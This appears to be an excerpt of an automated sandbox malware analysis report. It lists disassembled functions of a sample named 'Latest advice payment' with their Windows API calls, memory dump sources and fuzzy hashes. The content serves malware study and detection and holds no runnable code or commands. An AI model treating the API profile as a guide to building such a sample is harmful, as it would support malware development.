                                                            Function 00596FB7 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                            • String ID:
                                                            • API String ID: 3016257755-0
                                                            • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                            • Instruction ID: c1513926805207c4aee602827649126191c372e1cec41902333f78df2459e5ac
                                                            • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                            • Instruction Fuzzy Hash: AC01397245814EBBCF165E84CC4A8EE3F62FB1C350B598416FA1858031D336D9B1AF81
                                                            Function 005EB2C5 Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetWindowRect.USER32(?,?), ref: 005EB2E4
                                                            • ScreenToClient.USER32(?,?), ref: 005EB2FC
                                                            • ScreenToClient.USER32(?,?), ref: 005EB320
                                                            • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 005EB33B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: ClientRectScreen$InvalidateWindow
                                                            • String ID:
                                                            • API String ID: 357397906-0
                                                            • Opcode ID: d4582e74272388233bca7847553052651aabf1e95eca7d985183c6d3a723be79
                                                            • Instruction ID: 0d9c07b5a388f6894c281fcb02dcc915889cbccde32f54337dc9c8644f634835
                                                            • Opcode Fuzzy Hash: d4582e74272388233bca7847553052651aabf1e95eca7d985183c6d3a723be79
                                                            • Instruction Fuzzy Hash: 931174B9D00249EFDB01CFA9C8849EEBBF9FF18310F108166E954E3220D731AA559F51
                                                            Function 005C6BDA Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • EnterCriticalSection.KERNEL32(?), ref: 005C6BE6
                                                              • Part of subcall function 005C76C4: _memset.LIBCMT ref: 005C76F9
                                                            • _memmove.LIBCMT ref: 005C6C09
                                                            • _memset.LIBCMT ref: 005C6C16
                                                            • LeaveCriticalSection.KERNEL32(?), ref: 005C6C26
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: CriticalSection_memset$EnterLeave_memmove
                                                            • String ID:
                                                            • API String ID: 48991266-0
                                                            • Opcode ID: 9904229e0b1aacd39a0595af5a05c62040e554dff8c2f2e42d90187385f59d63
                                                            • Instruction ID: 71c3fea9580d19f2df0dad4e5a0e6d79eafceb6c962fdae7076e1198bcac705e
                                                            • Opcode Fuzzy Hash: 9904229e0b1aacd39a0595af5a05c62040e554dff8c2f2e42d90187385f59d63
                                                            • Instruction Fuzzy Hash: 13F0303A100100ABCF456F95DC89E4ABF69FF85320F048065FE086E266DB31A915DBB4
                                                            Function 00562218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetSysColor.USER32(00000008), ref: 00562231
                                                            • SetTextColor.GDI32(?,000000FF), ref: 0056223B
                                                            • SetBkMode.GDI32(?,00000001), ref: 00562250
                                                            • GetStockObject.GDI32(00000005), ref: 00562258
                                                            • GetWindowDC.USER32(?,00000000), ref: 0059BE83
                                                            • GetPixel.GDI32(00000000,00000000,00000000), ref: 0059BE90
                                                            • GetPixel.GDI32(00000000,?,00000000), ref: 0059BEA9
                                                            • GetPixel.GDI32(00000000,00000000,?), ref: 0059BEC2
                                                            • GetPixel.GDI32(00000000,?,?), ref: 0059BEE2
                                                            • ReleaseDC.USER32(?,00000000), ref: 0059BEED
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                            • String ID:
                                                            • API String ID: 1946975507-0
                                                            • Opcode ID: 585f949a36ad9f1cd85fbc173caa747792c1004e3e7fda3f7f7e3eab26bae0ae
                                                            • Instruction ID: eb4094204797b188d72077e83758b0f92f78be7ca9b320d51926accf93428cea
                                                            • Opcode Fuzzy Hash: 585f949a36ad9f1cd85fbc173caa747792c1004e3e7fda3f7f7e3eab26bae0ae
                                                            • Instruction Fuzzy Hash: ECE06531504284EAFF295F64FC4D7D83F15EB25332F008366FAA94C0E18B714584EB12
                                                            Function 005B8712 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetCurrentThread.KERNEL32 ref: 005B871B
                                                            • OpenThreadToken.ADVAPI32(00000000,?,?,?,005B82E6), ref: 005B8722
                                                            • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,005B82E6), ref: 005B872F
                                                            • OpenProcessToken.ADVAPI32(00000000,?,?,?,005B82E6), ref: 005B8736
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: CurrentOpenProcessThreadToken
                                                            • String ID:
                                                            • API String ID: 3974789173-0
                                                            • Opcode ID: 75325ee14a18b3193db9b1810862f6cb0990975f8c46b484e0a8d2260f2106d4
                                                            • Instruction ID: c7cb5265fff4ffadf44a22b6ff1b5c8aeac9e73a160801d24cb1236da69490a8
                                                            • Opcode Fuzzy Hash: 75325ee14a18b3193db9b1810862f6cb0990975f8c46b484e0a8d2260f2106d4
                                                            • Instruction Fuzzy Hash: 78E086366122529BDB209FB06D4CB963BACEF64796F158828B2C6CD040DE349449D750
                                                            Function 00566240 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 317COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: %_
                                                            • API String ID: 0-4145416222
                                                            • Opcode ID: fc309c277fe4bb87f023443fa6ab4cd366c31c3014397bd4d0095ccfcb08672b
                                                            • Instruction ID: 9c6a7793485a47c5a7c742667ba59ae19c6fadd2264d93e42c9e41cef3fe9340
                                                            • Opcode Fuzzy Hash: fc309c277fe4bb87f023443fa6ab4cd366c31c3014397bd4d0095ccfcb08672b
                                                            • Instruction Fuzzy Hash: 84B1C57590010ADBCF14EF94C8959FEBFB9FF98314F104526E902A7291EB349E85CB91
                                                            Function 005DAEA2 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 313COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: __itow_s
                                                            • String ID: xbb$xbb
                                                            • API String ID: 3653519197-1709228958
                                                            • Opcode ID: 37f2693f7eb578d4a198e6ba7b705300a2dc9ccb9ce708ad2bedc32cc41f555a
                                                            • Instruction ID: e8c20a55522fc8efb7b7b0f7224918db5adc766f4a94dbff5a06894978ada5a6
                                                            • Opcode Fuzzy Hash: 37f2693f7eb578d4a198e6ba7b705300a2dc9ccb9ce708ad2bedc32cc41f555a
                                                            • Instruction Fuzzy Hash: 5DB16F75A0010AEBDB24DF98C895EBABFBAFF58300F14845AF9459B351EB30D941CB50
                                                            Function 005CAFAC Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0057FC86: _wcscpy.LIBCMT ref: 0057FCA9
                                                              • Part of subcall function 00569837: __itow.LIBCMT ref: 00569862
                                                              • Part of subcall function 00569837: __swprintf.LIBCMT ref: 005698AC
                                                            • __wcsnicmp.LIBCMT ref: 005CB02D
                                                            • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 005CB0F6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                            • String ID: LPT
                                                            • API String ID: 3222508074-1350329615
                                                            • Opcode ID: 612e54bb1c5a481e1e6848696961d89192fea0ae1b77f6c01c4ff5971d460fe6
                                                            • Instruction ID: 1f4f001e02b0ae6973ead56702862360735b8a55f05beec42c47214d1fb9378b
                                                            • Opcode Fuzzy Hash: 612e54bb1c5a481e1e6848696961d89192fea0ae1b77f6c01c4ff5971d460fe6
                                                            • Instruction Fuzzy Hash: D5616E75A00215EFDB14DF94C896FAEBBB8FB48310F14406DF916AB291DB70AE44CB91
                                                            Function 00572957 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Sleep.KERNEL32(00000000), ref: 00572968
                                                            • GlobalMemoryStatusEx.KERNEL32(?), ref: 00572981
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: GlobalMemorySleepStatus
                                                            • String ID: @
                                                            • API String ID: 2783356886-2766056989
                                                            • Opcode ID: 9f65c9c0461413d297944a6d102bce25610a219bf0c79dd0e22fe5519bd7231f
                                                            • Instruction ID: 0016d2ad0a49da8cafe76730b2cf4695dc328b3f0af55703a695e01f5975249f
                                                            • Opcode Fuzzy Hash: 9f65c9c0461413d297944a6d102bce25610a219bf0c79dd0e22fe5519bd7231f
                                                            • Instruction Fuzzy Hash: 275128724187459BD320EF10D88ABABBBECFBC5344F41895DF2D8421A1DF318969CB66
                                                            Function 005C9734 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00564F0B: __fread_nolock.LIBCMT ref: 00564F29
                                                            • _wcscmp.LIBCMT ref: 005C9824
                                                            • _wcscmp.LIBCMT ref: 005C9837
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: _wcscmp$__fread_nolock
                                                            • String ID: FILE
                                                            • API String ID: 4029003684-3121273764
                                                            • Opcode ID: c3ae97f6664f2a5b9d93f9346c15289beba758adfca3e617b92d5200d1a88e3a
                                                            • Instruction ID: 40e7e4d2c9b7927916b4103eeabe404850ae9dedf9dedab09a4605af83db657a
                                                            • Opcode Fuzzy Hash: c3ae97f6664f2a5b9d93f9346c15289beba758adfca3e617b92d5200d1a88e3a
                                                            • Instruction Fuzzy Hash: A6419571A0021ABEDF219AE4CC5AFEFBFBDEF85710F014469F904A7181DA719904CBA5
                                                            Function 005A0574 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 115COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: ClearVariant
                                                            • String ID: Ddb$Ddb
                                                            • API String ID: 1473721057-2807125207
                                                            • Opcode ID: 085f6e64f4e2c6981dcbfda732fa17f2de2b3de59e25c1e1204e71969113cc4b
                                                            • Instruction ID: 640f415bba23a8e1290e99128a607601d63b7f8300213bf40c8d41745e9a0cb6
                                                            • Opcode Fuzzy Hash: 085f6e64f4e2c6981dcbfda732fa17f2de2b3de59e25c1e1204e71969113cc4b
                                                            • Instruction Fuzzy Hash: 4F51EE786087428FDB64DF18C484A1ABBF2BB99354F54981CF9859B361D731EC81CF92
                                                            Function 005D258E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _memset.LIBCMT ref: 005D259E
                                                            • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 005D25D4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: CrackInternet_memset
                                                            • String ID: |
                                                            • API String ID: 1413715105-2343686810
                                                            • Opcode ID: c1bd03189d73dc2decfd2087b09458576a9c4eeb7a304d1922a7a106408f62e4
                                                            • Instruction ID: 411651e9f45348ffdc0b9c5d8425853c9433674fa72a424fd8a10522cb6fbfe6
                                                            • Opcode Fuzzy Hash: c1bd03189d73dc2decfd2087b09458576a9c4eeb7a304d1922a7a106408f62e4
                                                            • Instruction Fuzzy Hash: BE311A7180011AEBCF11EFA4CC89EEEBFB8FF58310F10015AF915A6265EA319955DB60
                                                            Function 005E7A71 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 005E7B61
                                                            • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 005E7B76
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID: '
                                                            • API String ID: 3850602802-1997036262
                                                            • Opcode ID: caf66d3a8045f1319e67bb8a41b04d1573d5768ef3f82cd74781d0073ec57afc
                                                            • Instruction ID: 7581e03cec15f81acf96357aaf06c5c8922bb2b22a9a89ff0c899ac8b5f79fdb
                                                            • Opcode Fuzzy Hash: caf66d3a8045f1319e67bb8a41b04d1573d5768ef3f82cd74781d0073ec57afc
                                                            • Instruction Fuzzy Hash: CE410874A0564E9FDB18CF65D881BEABBB9FB08300F10016AE945EB351E770AA51DF90
                                                            Function 005E6A63 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • DestroyWindow.USER32(?,?,?,?), ref: 005E6B17
                                                            • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 005E6B53
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Window$DestroyMove
                                                            • String ID: static
                                                            • API String ID: 2139405536-2160076837
                                                            • Opcode ID: 13488f398e2320cda5e47297c2733eee7da1973c14ef911e0dc0db15680a5340
                                                            • Instruction ID: 6ee0d873f7bbb018477bacebf03e0549ae909ce0076eafbf048e106bc34de9fc
                                                            • Opcode Fuzzy Hash: 13488f398e2320cda5e47297c2733eee7da1973c14ef911e0dc0db15680a5340
                                                            • Instruction Fuzzy Hash: 94319E71200644AEEB149F65CC80BFB7BADFF987A0F109629F9E5D7190DA30AC81D760
                                                            Function 005C28A2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _memset.LIBCMT ref: 005C2911
                                                            • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 005C294C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: InfoItemMenu_memset
                                                            • String ID: 0
                                                            • API String ID: 2223754486-4108050209
                                                            • Opcode ID: 5e1b6e1e413fd8642f8f515e30f0cb6270c84208a7135f8f283e0c030be1d4f5
                                                            • Instruction ID: 39f7f6b0a9983361946a412f89aa962d1b4d7114967837727d91803bf1907f97
                                                            • Opcode Fuzzy Hash: 5e1b6e1e413fd8642f8f515e30f0cb6270c84208a7135f8f283e0c030be1d4f5
                                                            • Instruction Fuzzy Hash: 4231BF31600309DFEB24DE98C885FAEBFB9FF45350F14402DE985A61A0D7B09984CB51
                                                            Function 005E66D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 005E6761
                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 005E676C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID: Combobox
                                                            • API String ID: 3850602802-2096851135
                                                            • Opcode ID: fb280629c8f85a4b05f197ce18168f12a7b00baaae09614ee924bb5372d1d8db
                                                            • Instruction ID: aed5e067fef4a24e35e3dbc6316191f1eb2a0f0a1671ed2085cbd686fc2178e2
                                                            • Opcode Fuzzy Hash: fb280629c8f85a4b05f197ce18168f12a7b00baaae09614ee924bb5372d1d8db
                                                            • Instruction Fuzzy Hash: 6B11B271200249AFEF299F55CC80EBB3B6AFB983E8F104129F99597290D631DC9187A0
                                                            Function 005E6C07 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00561D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00561D73
                                                              • Part of subcall function 00561D35: GetStockObject.GDI32(00000011), ref: 00561D87
                                                              • Part of subcall function 00561D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00561D91
                                                            • GetWindowRect.USER32(00000000,?), ref: 005E6C71
                                                            • GetSysColor.USER32(00000012), ref: 005E6C8B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                            • String ID: static
                                                            • API String ID: 1983116058-2160076837
